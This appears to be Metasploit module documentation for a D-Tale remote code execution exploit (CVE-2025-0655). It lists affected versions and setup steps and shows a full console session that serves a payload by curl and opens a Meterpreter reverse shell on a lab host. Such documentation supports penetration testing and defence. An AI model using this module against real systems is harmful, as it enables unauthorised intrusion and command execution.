## Vulnerable Application

This exploit effectively serves as a bypass for CVE-2024-3408.
An attacker can override global state to enable custom filters, which then facilitates remote code execution.
Specifically, this vulnerability leverages the ability to manipulate global application settings
to activate the enable_custom_filters feature, typically restricted to trusted environments.
Once enabled, the /test-filter endpoint of the Custom Filters functionality can be exploited to execute arbitrary system commands.

The vulnerability affects:

    * D-Tale <= 3.15.1

This module was successfully tested on:

    * D-Tale 3.15.1 installed on Ubuntu 24.04
    * D-Tale 3.12.0 installed on Ubuntu 22.04
    * D-Tale 3.10.0 installed on Ubuntu 22.04
    * D-Tale 3.0.0 installed on Ubuntu 22.04
    * D-Tale 2.5.1 installed on Ubuntu 22.04
    * D-Tale 2.4.0 installed on Ubuntu 22.04


### Installation

1. `pip install 'dtale==3.15.1'`

2. `dtale --host 0.0.0.0`


## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/dtale_rce_cve_2025_0655`
4. Do: `run lhost=<lhost> rhost=<rhost>`
5. You should get a meterpreter


## Options


## Scenarios
```
msf6 > use exploit/linux/http/dtale_rce_cve_2025_0655
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/dtale_rce_cve_2025_0655) > options

Module options (exploit/linux/http/dtale_rce_cve_2025_0655):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    40000            yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    true             yes       Attempt to delete the binary after execution
   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST                            yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_FILELESS is false:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      agAyokIhdJZ      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Linux Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/dtale_rce_cve_2025_0655) > run lhost=192.168.56.1 rhost=192.168.56.17
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 3.15.1 detected.
[*] Use data_id: 1
[*] Updated the enable_custom_filters to true.
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:33210) at 2025-03-03 20:49:53 +0900
[*] Successfully executed the payload.
[*] Successfully cleaned up data_id: 1

meterpreter > getuid
Server username: ubu
meterpreter > sysinfo
Computer     : 192.168.56.17
OS           : Ubuntu 22.04 (Linux 6.8.0-52-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```
